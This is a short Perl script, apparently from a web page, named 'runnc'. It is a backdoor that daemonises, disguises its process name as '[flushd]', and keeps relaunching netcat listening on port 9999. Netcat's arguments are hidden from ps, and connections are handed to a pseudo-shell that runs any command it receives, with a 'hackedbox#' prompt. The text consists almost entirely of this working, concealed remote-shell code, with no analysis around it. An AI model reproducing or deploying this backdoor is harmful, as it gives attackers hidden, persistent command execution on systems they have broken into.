|
(view this code in a separate window) #!/usr/bin/perl # # runnc - run Netcat root shell. # # Usage: # 'runnc -d' to be daemon, # 'runnc' to be Netcat helper program (pseudo shell.) use POSIX; $FAKENAME='[flushd]'; $ME = $0; # save actual process name $0 = $FAKENAME; # Hide process name # If we are launched by 'nc -e' we will be called with # no arguments, so act as the pseudo-shell, looping # through input allowing the hacker to run commands. unless ( @ARGV ) { $|=1; open STDERR, ">&STDOUT"; print "Welcome to your root shell.\n"; print "hackedbox# "; # Print prompt for grins while (<>) { chomp; system($_) && print "$!\n"; # Run shell command print "hackedbox# "; } exit; } # We're supposed to start as a daemon. chdir '/'; # redirect file descriptors open STDIN, '/dev/null'; open STDOUT, '>/dev/null'; open STDERR, '>&STDOUT'; # fork off and get owned by init. fork and exit; # dissociate from terminal setsid or die "Can't start a new session: $!"; do { print "Running Netcat\n"; # fork and run the Netcat program (hide its process name too.) unless (open NETCAT, "|-") { exec { "/home/bri/bin/nc" } $FAKENAME; exit; } else { # send it the command line args in stdin to hide from ps. print NETCAT "-l -p 9999 -e $ME"; close NETCAT; } wait; # wait for Netcat to complete. } while 1; # keep looping forever.
|